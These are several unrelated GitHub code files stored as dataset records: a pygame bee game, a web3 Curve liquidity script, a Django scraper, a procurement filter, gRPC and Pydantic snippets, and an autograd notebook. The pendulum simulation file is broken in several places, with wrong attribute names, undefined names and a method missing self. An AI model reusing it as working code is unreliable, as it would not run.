self.background_sound.set_volume(self.base_volume)\n self.dance_sound = pygame.mixer.Sound(dance_path)\n self.dance_sound.set_volume(self.base_volume)\n\n def new_color(self):\n # color = colorsys.hsv_to_rgb(random.random(),1,1)\n # return tuple([int(255*i) for i in color])\n color = pygame.Color(0,0,0)\n color.hsva = (random.randint(0,360),100,100,100)\n return (color.r,color.g,color.b)\n # needs futher work\n colors = np.array([colorsys.rgb_to_hsv(*bee.color) for bee in self.bees.values()])\n colors_hue = np.array([c[0] for c in colors])\n if len(colors) <= 2:\n return tuple([255*i for i in colorsys.hsv_to_rgb(random.random(),1,1)])\n else:\n color_diff = np.roll(colors_hue,1) - colors_hue\n print(colors_hue)\n print(color_diff)\n index = np.argmax(np.abs(color_diff))\n print(index)\n new_hue = colors_hue[index]+color_diff[index]/2\n color = (int(255*(new_hue)+255)%255, 255, 255)\n print(new_hue)\n return color\n\n def add_bee(self, id):\n valied = False\n while not valied:\n x = random.randint(0, self.hive.rows)\n y = random.randint(0, self.hive.cols)\n valied = self.hive.is_valid((x,y))\n\n color = self.new_color()\n self.bees.update({id: Bee((x,y), id=id, color=color)})\n\n def add_flower(self):\n pos_found = False\n while not pos_found:\n pos = self.hive.flower_spawn_pos[random.randint(0,len(self.hive.flower_spawn_pos)-1)]\n if self.hive.is_valid(pos):\n pos_found = True\n self.hive.flowers.append(Flower(pos))\n\n def handle_bot_queue(self):\n while(not self.bot_queue.empty()):\n item = self.bot_queue.get()\n if item == \"flower\":\n self.add_flower()\n if item == \"intruder\":\n self.hive.place_intruder()\n if item == \"weapon\":\n self.hive.place_weapon()\n\n def handle_input(self):\n while(not self.queue.empty()):\n id, cmd = self.queue.get()\n\n if (cmd == \"kill\"):\n try:\n del self.bees[id]\n except:\n print(\"Kill Error\")\n elif not id in self.bees:\n self.add_bee(id)\n else:\n if cmd == 'action':\n self.dance(id)\n self.repair_comb(id)\n self.drop_wax(id)\n self.attack(id)\n self.pick_up(id)\n else:\n dir = html_dict[cmd]\n if id in self.bees:\n self.move_bee(id,dir)\n def dance(self, id):\n bee = self.bees[id]\n bee.dance()\n\n def drop_wax(self,id):\n bee = self.bees[id]\n for fm in self.hive.flower_machines:\n if bee.grid_pos == fm.input:\n if isinstance(bee.item, Flower):\n bee.item = None\n self.hive.wax.append(Wax(fm.output))\n\n def animate_bees(self):\n # calculate next position on bee path\n for bee in self.bees.values():\n target_pos = np.array(bee.get_target_pos())\n current_pos = np.array(bee.surface_pos)\n path = target_pos - current_pos\n #print(np.linalg.norm(path))\n if np.linalg.norm(path) < 5:\n #print(\"summen\")\n r = random.random()\n dir = np.array([r, 1.0-r])\n dir = dir/np.linalg.norm(dir)\n amplitude = random.random() * 2\n bee.surface_pos = current_pos + amplitude * dir\n else:\n #print(\"move\")\n step = 0.4\n bee.surface_pos = current_pos + step * path\n\n def draw_bees(self, surface=None):\n if surface is None:\n surface = self.screen\n for bee in self.bees.values():\n bee.paint(surface)\n\n def move_bee(self, id, direction):\n try:\n pos = self.bees[id].new_pos(direction)\n if self.hive.is_valid(pos):\n self.bees[id].move_bee(pos)\n except:\n pass\n\n def pick_up(self, id):\n pos = self.bees[id].grid_pos\n for item_list in self.hive.items:\n for i,item in enumerate(item_list):\n if item.grid_pos == pos:\n del item_list[i]\n self.drop(id)\n self.bees[id].pick_up(item)\n continue\n\n def drop(self, id):\n item = self.bees[id].item\n if isinstance(item, Flower):\n self.hive.flowers.append(Flower(self.bees[id].grid_pos))\n elif isinstance(item, Wax):\n self.hive.flowers.append(Wax(self.bees[id].grid_pos))\n elif isinstance(item, Weapon):\n self.hive.flowers.append(Weapon(self.bees[id].grid_pos))\n self.bees[id].item = None\n\n def repair_comb(self, id):\n if isinstance(self.bees[id].item, Wax):\n for i in html_dict:\n pos = self.bees[id].new_pos(html_dict[i])\n if self.hive.exists(pos):\n if not self.hive.cell_state[pos]:\n for intr in self.hive.intruders:\n if intr.grid_pos == pos:\n break\n else: # executed only if intr loop did not break -> no intruder on pos\n self.hive.cell_state[pos] = 1\n self.bees[id].item = None\n return\n continue # executed if intr loop did break -> pos occupied by intruder\n\n def attack(self,id):\n if isinstance(self.bees[id].item, Weapon):\n for i in html_dict:\n pos = self.bees[id].new_pos(html_dict[i])\n for intr in self.hive.intruders:\n if intr.grid_pos == pos:\n self.hive.intruders.remove(intr)\n return\n\n\n def draw_items(self, surface=None):\n if surface is None:\n surface = self.screen\n for item_list in self.hive.items:\n for item in item_list:\n item.paint(surface)\n\n def apply_temperature(self):\n total_dancers = sum(bee.isdancer() for bee in self.bees.values())\n total_bees = len(self.bees)\n\n self.temperature += float(total_dancers)/(total_bees+1) - 0.25\n self.temperature = min(max(self.temperature, self.temperature_limits[0]), self.temperature_limits[1])\n\n def draw_flower_machine(self):\n for fm in self.hive.flower_machines:\n fm.draw(self.screen)\n\n def draw_temperature(self, surface=None):\n if surface is None:\n surface = self.screen\n width = 30\n height = min(210,max(0,int(self.temperature)))\n\n self.screen.fill((0, 0, 0))\n\n warning_level_red = warning_level_green = warning_level_blue = 0\n if self.temperature > self.temperature_limits[1] * 0.7:\n freq = (time.time() - self.t0) * 2\n warning_level_red = max(0, int(255 * (np.abs(np.sin(freq)))))\n elif self.temperature < self.temperature_limits[1]*0.3:\n freq = (time.time() - self.t0 ) * 2\n warning_level_blue = max(0,int( 255 * (np.abs(np.sin(freq)))))\n else:\n warning_level_green = 255\n\n thermometer_current = self.thermometer.copy()\n pygame.draw.circle(thermometer_current, (warning_level_red, warning_level_green, warning_level_blue), (35, 273), 30)\n pygame.draw.rect(thermometer_current, (warning_level_red,warning_level_green, warning_level_blue), ((22,247-height), (width,height)))\n thermometer_current.blit(self.thermometer, ((0,0), (0, 0)))\n\n surface.blit(thermometer_current, ((int(self.disp_width * 0.90),int(self.disp_height * 0.2)), (0, 0)))\n\n def check_game_over(self):\n if sum(state == 0 for state in self.hive.cell_state.values()) == 0:\n return (True, 'WIN')\n elif self.temperature_game_over:\n if self.temperature <= self.temperature_limits[0]:\n print(\"Bees froze to death!\")\n return (True, 'COLD')\n elif self.temperature >= self.temperature_limits[1]:\n print(\"Bees suffocated to the heat!\")\n return (True, 'HEAT')\n return (False, None)\n\n def draw_game_over(self, reason):\n if reason == 'WIN':\n self.screen.blit(self.game_over_win, ((DISP_WIDTH/10, DISP_HEIGHT/10), (0,0)))\n elif reason == 'HEAT':\n self.screen.blit(self.game_over_heat, ((DISP_WIDTH/10, DISP_HEIGHT/10), (0,0)))\n elif reason == 'COLD':\n pass\n self.screen.blit(self.game_over_cold, ((DISP_WIDTH/10, DISP_HEIGHT/10), (0,0)))\n\n def audio_settings(self):\n num_bees = len(self.bees)\n num_dancer = sum([bee.isdancer() for bee in self.bees.values()])\n\n pygame.mixer.Channel(1).set_volume(self.audio_function(num_bees))\n pygame.mixer.Channel(2).set_volume(self.audio_function(num_dancer) if num_dancer > 0 else 0)\n # print(self.background_sound.get_volume())\n # print(pygame.mixer.Channel(1).get_volume())\n\n def audio_function(self, x):\n return self.base_volume + (1-self.base_volume)*min(1,x/10)\n\n\n# define a main function\ndef main():\n subprocess.run([\"mpv\", \"--fs\", \"BEE_Intro.mpg\"])\n\n reason = None\n\n game = GameManager(telegram=True)\n pygame.mixer.pre_init()\n pygame.mixer.init()\n # pygame.mixer.music.load(sound_path)\n\n pygame.mixer.Channel(1).play(game.background_sound, loops=-1)\n pygame.mixer.Channel(2).play(game.dance_sound, loops=-1)\n\n # Key Dictionary\n key_dict = {\n # pygame.key : (xmove, ymove, bee_id)\n pygame.K_w : (-1,-1, 0),\n pygame.K_e : (-1,0, 0),\n pygame.K_d : (0,1, 0),\n pygame.K_x : (1,1, 0),\n pygame.K_y : (1,0, 0),\n pygame.K_a : (0,-1, 0),\n pygame.K_u: (-1, -1, 1),\n pygame.K_i: (-1, 0, 1),\n pygame.K_k: (0, 1, 1),\n pygame.K_m: (1, 1, 1),\n pygame.K_n: (1, 0, 1),\n pygame.K_h: (0, -1, 1)\n }\n\n # define a variable to control the main loop\n game_over = False\n\n # define Radius from gridsize and screensize\n clock = pygame.time.Clock()\n\n # main loop\n while not game_over:\n clock.tick(FPS)\n # event handling, gets all event from the event queue\n for event in pygame.event.get():\n # only do something if the event is of type QUIT\n if event.type == pygame.KEYDOWN:\n try:\n xy_move = key_dict[event.key]\n game.move_bee(xy_move[2],(xy_move[0], xy_move[1]))\n except:\n pass\n if event.key == pygame.K_PLUS:\n game.add_bee(random.randint(0,100))\n if event.key == pygame.K_SPACE:\n game.add_flower()\n if event.key == pygame.K_ESCAPE:\n game_over = True\n if event.key == pygame.K_0:\n game.temperature_game_over = not game.temperature_game_over\n if game.temperature_game_over:\n print(\"enable game over\")\n else:\n print(\"disable game over\")\n if event.type == pygame.QUIT:\n # change the value to False, to exit the main loop\n game_over = True\n print(\"Waiting for Tornado\")\n game.tornado_target.stop()\n game.tornado_thread.join(1)\n print(\"Tornado joined\")\n\n game.handle_input()\n game.handle_bot_queue()\n game.apply_temperature()\n game.audio_settings()\n\n game.draw_temperature()\n\n game.animate_bees()\n game.hive.draw_grid(game.screen)\n game.draw_flower_machine()\n game.draw_bees()\n\n game.draw_flower_machine()\n game.draw_items()\n\n if not game_over:\n (game_over, reason) = game.check_game_over()\n\n if game_over:\n game.draw_game_over(reason)\n\n pygame.display.flip()\n # draw a line\n\n if reason is not None:\n time.sleep(7)\n\n pygame.display.quit()\n if hasattr(game, 'bot'):\n game.bot.kill()\n pygame.quit()\n\n# run the main function only if this module is executed as the main script\n# (if you import this as a module then nothing is executed)\nif __name__ == \"__main__\":\n # call the main function\n main()\n","repo_name":"MiningXL/ggj2020","sub_path":"GGJ2020.py","file_name":"GGJ2020.py","file_ext":"py","file_size_in_byte":15601,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"30985189954","text":"from web3 import Web3, HTTPProvider\nimport sys\nimport os\nimport json\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nw3 = Web3(HTTPProvider(os.environ['FORK_URI'],request_kwargs={'timeout':60}))\n\naccount = w3.eth.account.from_key(os.environ['FORK_PRIVATE_KEY'])\n\n\nwith open(os.path.join(sys.path[0], \"../../abi/CurvePool.json\")) as f:\n CurveGauge_ABI = json.load(f)\nwith open(os.path.join(sys.path[0], \"../../abi/IERC20.json\")) as f:\n IERC20_ABI = json.load(f)\n\ntoken_address = \"0x956F47F50A910163D8BF957Cf5846D573E7f87CA\"\npool_address = \"0xBaaa1F5DbA42C3389bDbc2c9D2dE134F5cD0Dc89\"\n\n\nPool = w3.eth.contract(abi=CurveGauge_ABI, address=pool_address)\ntoken = w3.eth.contract(abi=IERC20_ABI, address=token_address)\n\n#----------------------------------------------------------------\n#----------------------------------------------------------------\n# Parameters to update\namount = w3.toWei(1200000, 'ether')\n#----------------------------------------------------------------\n#----------------------------------------------------------------\n\nprint(\"Deposit in Pool\")\nprint()\n\nprint(\"Approve tx:\")\n\ntx_dict = token.functions.approve(pool_address, amount).buildTransaction({\n 'from' : account.address,\n 'nonce' : w3.eth.getTransactionCount(account.address),\n 'maxFeePerGas': w3.toWei(105, 'gwei'),\n 'maxPriorityFeePerGas' : w3.toWei(5, 'gwei')\n})\n\nresult = w3.eth.send_raw_transaction((w3.eth.account.sign_transaction(tx_dict, account.key)).rawTransaction)\nprint(result.hex())\ntxReceipt = w3.eth.wait_for_transaction_receipt(result)\nif(txReceipt.status == 1):\n print(\"Success\")\nelse:\n print(\"Tx failed\")\n\n\n\nprint()\nprint(\"Deposit tx:\")\ntx_dict = Pool.functions.add_liquidity([0, amount, 0], w3.toWei(1000000, 'ether')).buildTransaction({\n 'from' : account.address,\n 'nonce' : w3.eth.getTransactionCount(account.address),\n 'maxFeePerGas': w3.toWei(105, 'gwei'),\n 'maxPriorityFeePerGas' : w3.toWei(5, 'gwei')\n})\n\nresult = w3.eth.send_raw_transaction((w3.eth.account.sign_transaction(tx_dict, account.key)).rawTransaction)\nprint(result.hex())\ntxReceipt = w3.eth.wait_for_transaction_receipt(result)\nif(txReceipt.status == 1):\n print(\"Success\")\nelse:\n print(\"Tx failed\")\n\n","repo_name":"Kogaroshi/ethcc-hack-warden","sub_path":"scripts/fork/lp.py","file_name":"lp.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8185355205","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.options import Options\nfrom .models import Event\nfrom dotenv import load_dotenv \nimport time\nimport os\nimport re\n\nload_dotenv('.env')\n\ndef getData():\n arr = []\n options = Options()\n options.headless = True\n browser = webdriver.Firefox(options=options)\n\n browser.get(os.getenv('BASE_URL'))\n browser.implicitly_wait(1)\n\n for date in browser.find_elements_by_css_selector(os.getenv('DATE')):\n inDate = {\"date\": '', \"tournament\": '', \"events\": [] }\n cDate = date.find_elements_by_css_selector(os.getenv('DATE_TITLE'))[0]\n inDate[\"date\"] = cDate.text\n for tournament in date.find_elements_by_css_selector(os.getenv('TOURNAMENT')):\n for title in tournament.find_elements_by_css_selector(os.getenv('TOURNAMENT_TITLE')):\n inDate[\"tournament\"] = title.text\n for ev in tournament.find_elements_by_css_selector(os.getenv('EVENT')):\n for events in ev.find_elements_by_css_selector(os.getenv('EVENT_SELECTOR')):\n hour = events.find_element_by_css_selector(os.getenv('CUSTOM1'))\n match = events.find_element_by_css_selector(os.getenv('CUSTOM2'))\n tv = events.find_element_by_css_selector(os.getenv('CUSTOM3'))\n obj = { \n \"match\" : match.text,\n \"hour\": hour.text,\n \"tv\": tv.text\n }\n instance = Event.objects.create(date=inDate[\"date\"], tournament=inDate[\"tournament\"], hour=hour.text, match=match.text, tv=tv.text)\n print(instance)\n inDate[\"events\"].append(obj)\n arr.append(inDate)\n browser.quit()\n return arr\n\ndef index(arg1):\n return HttpResponse('hello')\n\ndef we(arg1):\n first_event_date = Event.objects.filter(date=\"LUNES 04 DE ENERO\")\n print(first_event_date[0])\n return HttpResponse(first_event_date[0])\n # arr = getData()\n # return HttpResponse(arr)\n\ndef time(request, date):\n arr = getData() \n dateMapper = {\n \"today\": 1,\n \"tomorrow\": 2,\n \"day-after-tomorrow\": 3\n }\n index = dateMapper[date]\n print(arr[index])\n return HttpResponse(arr[index])\n","repo_name":"jmmzzei/sports-agenda-api","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"85283697","text":"import json as json\nimport csv\nimport pandas as pd\nfrom sodapy import Socrata\n\n#Implementacion KMP\ndef KMPSearch(pat, txt):\n if pat is \"\":\n return True\n M = len(pat) \n N = len(txt) \n lps = [0]*M \n j = 0\n computeLPSArray(pat, M, lps) \n i = 0 \n while i < N: \n if pat[j] == txt[i]: \n i += 1\n j += 1\n \n if j == M: \n j = lps[j-1] \n return True\n elif i < N and pat[j] != txt[i]: \n if j != 0: \n j = lps[j-1] \n else:\n i += 1\n if i == N:\n return False\n \ndef computeLPSArray(pat, M, lps): \n len = 0 \n lps[0] \n i = 1\n while i < M: \n if pat[i]== pat[len]: \n len += 1\n lps[i] = len\n i += 1\n else: \n if len != 0: \n len = lps[len-1] \n else: \n lps[i] = 0\n i += 1\n\n\nscd1=\"Soluciones ciudadanos digitales\"\nscd = [\"aarpeta ciudadana\", \"autenticacion digital\",\"autenticacion electronica\",\n \"certificados digitales\",\"firmas digitales\",\"firma digital\",\n \"servicios de certificacion digital\",\"carpeta electronica\",\n \"interoperabilidad\",\"x-road\",\"x road\",\"estampado cronologico\"\n \"sellado de tiempo\",\"Servicios ciudadanos digitales\"]\n\nsem1= \"Soluciones con enfoque misional\"\nsem = [\"realizacion de eventos\",\"eventos institucionales\",\"organizacion y coordinacion integral de los eventos\"]\n\nsci1=\"Soluciones ciudades inteligentes\"\nsci = [\"smartcities\",\"semaforos inteligentes\"]\n\nsdp1=\"Soluciones de participacion\"\nsdp = [\"votaciones\",\"consultas ciudadanas\"]\n\nsgd1=\"Soluciones en gestion documental\"\nsgd = [\"gestion de archivo\",\"digitalizacion de documentos\",\"indexacion de documentos\"\n \"gestion documental\",\"documental\",\"almacenamiento\",\"administracion documental integral\",\n \"digitalizacion\",\"sistema documental\",\"bpo\"]\n\noti1=\"Outsourcing TI\"\noti = [\"procesos con dos o mas componentes diversos de los numerales 6\"]\n\ndtc1=\"Datacenter\"\ndtc = [\"data center, back up, centro de datos, migracion de datos\"]\n\nntk1=\"Networking\"\nntk = [\"redes lan y/o wan, cableado\", \"switch\", \"switches\", \"networking\",\n \"servicio de canales terrestres\",\"satelites e internet\"]\n\ncmc1=\"Comunicaciones\"\ncmc = [\"videoconferencias\",\"telecomunicaciones\",\"voz y datos\", \"video y seguridad\"\n \"red de datos\",\"inalambricas\",\"seguridad perimetral\"]\n\nsgt1=\"Servicio de gestion de ti\"\nsgt = [\"mesa de ayuda\",\"help desktop\",\"contaccenter\",\"centro de contacto\",\n \"infraestructura tecnologica\",\"plataforma tecnologica\",\"sistemas operativos\",\n \"aplicacion\",\"autentificacion y cifrado\",\"software de monitoreo y control\",\n \"pruebas de infraestructura y aplicacion\",\"bases de datos\"]\neyd1=\"Equipos y dispositivos\"\neyd = [\"computadores\",\"escritorios\",\"mouse\",\"equipos y perifericos\"]\n\nimi1=\"Impresion inteligente\"\nimi = [\"print\",\"impresion\",\"fotocopiadoras\"]\n\nurl_procesos = []\n\n\n#Filtro primero por entidades y luego por referencia de proceso\n# Retorna una tupla de 3 con el portafolio del proceso, el proceso de referecia y el link del proceso\ndef filterLicit(entidad, ref_proc):\n entidad=entidad.lower()\n ref_proc=ref_proc.lower()\n ruta =(\"/users/hugherli/Documents/GitHub/fulldatos.csv\")\n with open(ruta, encoding=\"utf-8\") as ff:\n csv_reader = csv.reader(ff, delimiter=',')\n for row in csv_reader:\n #Descripcion\n des = row[10].lower()\n #Id del proceso\n id_proc= row[28]\n #url para la descarga de los archivos\n url = row[50]\n #Entidad que publica la licitacion\n enti = row[12].lower()\n #codigo de referencia del proceso\n ref = row[44].lower()\n #presupuesto base para la licitacion\n presupuesto = row[39]\n #Modalidad de contratacion\n modalidad = row[31]\n #Duracion de la licitacion en la medida que salga en la columna 49\n duracion = row[11]+\" \"+row[49]\n #Contratista \n contratatista = row[35]\n\n if presupuesto.split(\".\")[0].isdigit():\n \n if int(presupuesto.split(\".\")[0]) < 100000000:\n continue\n \n if KMPSearch(entidad ,enti):\n if KMPSearch(ref_proc, ref):\n \n for kw in scd:\n if KMPSearch(kw, des):\n url_procesos.append((scd1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in sem:\n if KMPSearch(kw, des):\n url_procesos.append((sem1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in sci:\n if KMPSearch(kw, des):\n url_procesos.append((sci1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in sdp:\n if KMPSearch(kw, des):\n url_procesos.append((sdp1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break \n for kw in sgd:\n if KMPSearch(kw, des):\n url_procesos.append((sgd1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break \n for kw in oti:\n if KMPSearch(kw, des):\n url_procesos.append((oti1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break \n for kw in dtc:\n if KMPSearch(kw, des):\n url_procesos.append((dtc1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break \n for kw in ntk:\n if KMPSearch(kw, des):\n url_procesos.append((ntk1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in cmc:\n if KMPSearch(kw, des):\n url_procesos.append((cmc1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in sgt:\n if KMPSearch(kw, des):\n url_procesos.append((sgt1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in eyd:\n if KMPSearch(kw, des):\n url_procesos.append((eyd1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n break\n for kw in imi:\n if KMPSearch(kw, des):\n url_procesos.append((imi1,des,enti,modalidad,contratatista,ref,presupuesto,duracion,url))\n else:\n continue\n else:\n continue\n \n for x in url_procesos:\n somedict = {\"portafolio\":[ x[0] for x in url_procesos ],\n \"descripcion\":[ x[1] for x in url_procesos ],\n \"entidad\":[ x[2] for x in url_procesos ],\n \"modalidad\":[ x[3] for x in url_procesos ],\n \"contratista\":[ x[4] for x in url_procesos ],\n \"ref_proceso\":[ x[5] for x in url_procesos ],\n \"presupuesto\":[ x[6] for x in url_procesos ],\n \"duracion\":[ x[7] for x in url_procesos ],\n \"url_descarga\":[ x[8] for x in url_procesos]}\n return somedict\n","repo_name":"Andresalsu/datalicit","sub_path":"Back SECOP/datalicit.py","file_name":"datalicit.py","file_ext":"py","file_size_in_byte":7923,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26248366208","text":"import math as m\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass PendulumSpring:\r\n def __init__(self, name = 'Pendulum', mass = 1.0, theta = m.pi/9, g = -9.81, nl = 1.0, hc = 1, pos=[0,0,0], vel=[0,0,0], acln = [0,0,0], spring=False):\r\n\r\n pos=[nl*m.sin(theta),nl*m.cos(theta),0]\r\n self.name = name\r\n self.mass = 1\r\n self.pos = pos\r\n self.vel = vel\r\n self.acln = acln\r\n self.g = g\r\n self.nl = nl\r\n self.hc = hc\r\n self.thetta = theta\r\n self.spring = spring\r\n\r\n def UpdateAcceleration():\r\n self.theta = abs(m.atan(self.pos[0]/self.pos[1]))\r\n self.acln = [self.g*m.tan(self.theta), self.g*1-m.cos(self.theta), 0]\r\n if self.spring == True:\r\n ext = sqrt(sum(x**2 for x in self.pos)) - self.nl\r\n acln = self.hc * ext / self.mass\r\n self.acln += [acln*m.sin(self.theta), acln*m.cos(self.theta), 0]\r\n\r\n def ER_update(self,deltaT):\r\n self.position += 0.5 * self.velocity * deltaT\r\n self.velocity += 0.5 * self.acceleration * deltaT\r\n \r\n \r\n \r\n\r\n\r\nPendulum1 = PendulumSpring(name='Pendulum1')\r\ndeltaT = 1\r\nData = []\r\nfor i in range(1,100):\r\n Pendulum1.UpdateAcceleration()\r\n Pendulum1.ER_update(deltaT)\r\n T.append(i)\r\n posx.append(Pendulum1.pos[0])\r\n posy.append(Pendulum1.pos[1])\r\n length.append(sqrt(sum(x**2 for x in self.pos)))\r\n \r\n\r\nfig = plt.figure()\r\nax = plt.axes()\r\nax.set_ylabel('y')\r\nax.set_xlabel('x')\r\nplt.scatter(posx, posy)\r\nplt.shwow()\r\n","repo_name":"abansal3/PHYS389Project","sub_path":"PendulumSpringClass.py","file_name":"PendulumSpringClass.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"13389055243","text":"from setuptools import setup , find_packages\n\nwith open('README.md','r', encoding='utf8') as f:\n LONG_DESCRIPTION=f.read()\n\nAUTHOR='nitesh kumar gupta'\nEMAIL='guptanitesh2711@gmail.com'\n__version__='0.0.1'\n\n\nsetup(name='deepclassifier-Xray',\nauthor=AUTHOR,\nauthor_email=EMAIL,\nlicense='MIT',\nversion=__version__,\n#install_requires=['tensorflow','pandas','numpy','matplotlib'],\npackages=find_packages(where=\"src\"),\n# look for packages in ths directory/this is the base directory\nlong_description=LONG_DESCRIPTION,\nurl='https://github.com/niteshgupta2711/XRAY_Classification',\npackage_dir={\"\": \"src\"},\nproject_urls={'Bug Tracker ': 'https://github.com/niteshgupta2711/XRAY_Classification'},\n)","repo_name":"niteshgupta2711/XRAY_Classification","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"30890388975","text":"# Python code to find positive number in a list\n\nlst =[]\nnum = int(input(\"Enter the number of elements to insert: \"))\n\nfor i in range(0, num):\n ele = int(input(\"Enter both positive and negative number: \"))\n lst.append(ele)\n\nprint(\"Entered list is: \",lst)\n\nprint(\"Positive number in list: \")\nfor x in lst:\n if x>=0:\n print(x,end=\" \")","repo_name":"shubhamkochar/Python_Codes","sub_path":"List/PositiveNumbersInList.py","file_name":"PositiveNumbersInList.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"22935714438","text":"import grpc\n\nimport detect_image_pb2\nimport detect_image_pb2_grpc \n# Open a grpc channel\nfrom PIL import Image\nimport sys\n\nclass ClientTest():\n def __init__(self,port='localhost:50051',image_output='client_out'):\n\t self.port = port\n\t self.image_output = image_output\n def open_grpc_channel(self):\n channel = grpc.insecure_channel(self.port)\n stub = detect_image_pb2_grpc.ImageDemoStub(channel)\n return stub\n def send_request(self, stub, img):\n out_file_name = self.image_output+'.png'\n img = img\n img = img.resize((480,320))\n img_b = img.tobytes() \n Image = detect_image_pb2.InputImage(Image =img_b)\n response = stub.DetectImage(Image)\n image = Image.frombytes(data=response.Image,size=(480,320),mode='RGB')\n return image\n\n#make the call \n\n# print(type(response.Image))\n\n","repo_name":"samimideksa/All-In-One","sub_path":"Service/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"93"} +{"seq_id":"6970704470","text":"\nimport json\nfrom time import sleep\nfrom flexweb import store_transaction, store\nfrom urllib.parse import parse_qsl\n\ndef flexweb_handler(env):\n\n kv = dict(parse_qsl(env.args[b'qs']))\n if kv[b'op'] == b\"write\":\n data = json.loads(env.args[b'body'].decode())\n s = []\n w = []\n r = []\n s.append(store_transaction(env))\n s.append(store_transaction(env))\n idx = 0\n for k in data:\n w.append(s[idx].write(k, data[k].encode('utf-8')))\n r.append(s[idx].read(k).decode())\n\n idx = (idx + 1) % 2\n\n s[0].commit()\n s[1].commit()\n return json.dumps({'w': w, 'r': r})\n elif kv[b'op'] == b\"read\":\n s = store(env)\n return s.read(kv[b'k'].decode()).decode()\n","repo_name":"vincentsmh/flexweb","sub_path":"flexweb/apps/flexweb/test/python/test_multi_transactions.py","file_name":"test_multi_transactions.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"42344406221","text":"from pydantic import BaseModel\nfrom typing import List, Optional\nfrom bson.objectid import ObjectId\n\n\nclass PydanticObjectId(ObjectId):\n @classmethod\n def __get_validators__(cls):\n yield cls.validate\n\n @classmethod\n def validate(cls, value: ObjectId | str) -> ObjectId:\n if value:\n try:\n ObjectId(value)\n except ValueError:\n raise ValueError(f\"Not a valid object id: {value}\")\n return value\n\n\nclass BoosterSetIn(BaseModel):\n name: str\n description: Optional[str]\n ratio: dict\n mv: list\n normals: list\n rares: list\n super_rares: list\n ultra_rares: list\n created_on: dict\n updated_on: dict\n all_cards: Optional[List]\n cover_image: Optional[str]\n\n\nclass BoosterSet(BoosterSetIn):\n id: PydanticObjectId\n\n\nclass BoosterSetOut(BoosterSetIn):\n id: str\n\n\nclass BoosterSetsAll(BaseModel):\n booster_sets: List\n","repo_name":"Gogorenascence/pm-deck-app","sub_path":"api/models/booster_sets.py","file_name":"booster_sets.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"25172960616","text":"\n# coding: utf-8\n\n# In[4]:\n\n\nget_ipython().magic('matplotlib inline')\nimport matplotlib.pyplot as plt\nimport autograd.numpy as np\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.colors import LogNorm\nfrom matplotlib import animation\nfrom IPython.display import HTML\n\nfrom autograd import elementwise_grad, value_and_grad\nfrom scipy.optimize import minimize\nfrom collections import defaultdict\nfrom itertools import zip_longest\nfrom functools import partial\n\n\n# In[5]:\n\n\nf = lambda x, y: (1.5 - x + x*y)**2 + (2.25 - x + x*y**2)**2 + (2.625 - x + x*y**3)**2\nxmin, xmax, xstep = -4.5, 4.5, .2\nymin, ymax, ystep = -4.5, 4.5, .2\nx, y = np.meshgrid(np.arange(xmin, xmax + xstep, xstep), np.arange(ymin, ymax + ystep, ystep))\nz = f(x, y)\nminima = np.array([3., .5])\nf(*minima)\nminima_ = minima.reshape(-1, 1)\nminima_\n\n\n# In[6]:\n\n\n# 3D surface plot\nfig = plt.figure(figsize=(8, 5))\nax = plt.axes(projection='3d', elev=50, azim=-50)\n\nax.plot_surface(x, y, z, norm=LogNorm(), rstride=1, cstride=1, \n edgecolor='none', alpha=.8, cmap=plt.cm.jet)\nax.plot(*minima_, f(*minima_), 'r*', markersize=10)\n\nax.set_xlabel('$x$')\nax.set_ylabel('$y$')\nax.set_zlabel('$z$')\n\nax.set_xlim((xmin, xmax))\nax.set_ylim((ymin, ymax))\n\nplt.show()\n\n\n# In[7]:\n\n\ndz_dx = elementwise_grad(f, argnum=0)(x, y)\ndz_dy = elementwise_grad(f, argnum=1)(x, y)\n\nfig, ax = plt.subplots(figsize=(10, 6))\n\nax.contour(x, y, z, levels=np.logspace(0, 5, 35), norm=LogNorm(), cmap=plt.cm.jet)\nax.quiver(x, y, x - dz_dx, y - dz_dy, alpha=.5)\nax.plot(*minima_, 'r*', markersize=18)\n\nax.set_xlabel('$x$')\nax.set_ylabel('$y$')\n\nax.set_xlim((xmin, 